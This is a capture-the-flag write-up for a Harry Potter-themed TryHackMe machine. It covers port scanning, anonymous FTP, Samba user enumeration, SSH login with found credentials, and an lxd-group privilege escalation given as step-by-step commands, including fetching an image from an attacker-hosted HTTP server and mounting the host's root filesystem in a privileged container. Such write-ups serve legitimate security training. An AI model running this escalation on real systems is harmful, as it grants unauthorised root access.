Categories
Capture The Flag

Chamber Of Secrets- Sacramentum Writeup

chamber of secrets

This post is the official write-up for the Chamber of Secrets-themed machine used in Sacramentum CTF. You can find these machines on Tryhackme.

Let’s get started by deploying the machine. Now, after deploying the machine, start with a basic Nmap scan and see which ports and services are open and running on the particular IP address.

nmap -sC -sV 10.10.79.75 -vv
Chamber Of Secrets- Sacramentum Writeup 1

In this case, FTP is running, so let’s try to connect with the user ‘anonymous’ and leave the password blank.

Chamber Of Secrets- Sacramentum Writeup 2

Anonymous connection works and we found quite some information in FTP, a file (passwd.txt), and 2 hidden folders (‘.GodricGryffindor’ and ‘…’)

Let’s go ahead and see what the password file contains.

Chamber Of Secrets- Sacramentum Writeup 3

This looks like a base64, let’s decode it from base64decode

Chamber Of Secrets- Sacramentum Writeup 4

Looks like we found a possible user – Harry.

The folder ‘.GodricGryffindor’ has a file Sword.txt which contains our first flag ‘Ch4mb3r0fS3cr3ts{Al4rt3_A5c3nd@r3}’

Chamber Of Secrets- Sacramentum Writeup 5
Chamber Of Secrets- Sacramentum Writeup 6

Now if we check the ‘…’ folder, there is another passwd.txt file that contains a string ‘1_4m_Th3_Ch0s3n_0n3’ which can be our password.

Trying to connect to FTP and ssh without tentative user ‘Harry’ and password ‘1_4m_Th3_Ch0s3n_0n3’ doesn’t get us anywhere.

Let’s move on and focus on the Samba service by enumerating it using enum4linux.

Chamber Of Secrets- Sacramentum Writeup 7

No important information here.

Chamber Of Secrets- Sacramentum Writeup 8

No peculiar shares are available.

Chamber Of Secrets- Sacramentum Writeup 9

Voila! We found all the users.

Let’s try these users with our password ‘1_4m_Th3_Ch0s3n_0n3’.

The creds – ‘h4rry’:’1_4m_Th3_Ch0s3n_0n3′ work and we connect to ssh where we find our second flag – ‘Ch4mb3r0fS3cr3ts{D3v1Ls_5n4R3}’

Chamber Of Secrets- Sacramentum Writeup 10

After this while trying basic methods of PrivEsc, we find that ‘h4rry’ is part of lxd group. If you don’t know about lxd, you can read about it here.

On some research, we can find that we can use lxd to gain root access to the file system by creating an lxd container and mounting the whole file system of the machine to the container.

Commands for lxd PrivEsc –

ON ATTCKER MACHINE
1. Cloning the required image builder
git clone <https://github.com/saghul/lxd-alpine-builder>
2. cd lxd-alpine-builder
3. building the image
./build-alpine 
4. Initialize a server to transfer tar file.
python -m SimpleHTTPServer 80

ON VICTIM MACHINE
1. wget the tar file formed on the attacker machine
2. Importing the image file
lxc image import 'InsetTarFile' --alias privesc
3. Initializing an lxd container
lxc init privesc privesc-container -c security.privileged=true
4. Mounting the file system to lxd container
lxc config device add privesc-container mydevice disk source=/ path=/mnt/root recursive=true
5. lxc start privesc-container
6. lxc exec privesc-container /bin/sh

You can find a detailed explanation of lxd escalation here.

Chamber Of Secrets- Sacramentum Writeup 11

The root flag is in /mnt/root/root folder – ‘Ch4mb3r0fS3cr3ts{1_4m_L0rd_V0ld3m0rt}’

If you liked this writeup there are many more writeups like this here.

Sometimes we include links to online retail stores and/or online campaigns. If you click on one and make a purchase we may receive a small commission.

Comments:

Leave a Reply

Your email address will not be published. Required fields are marked *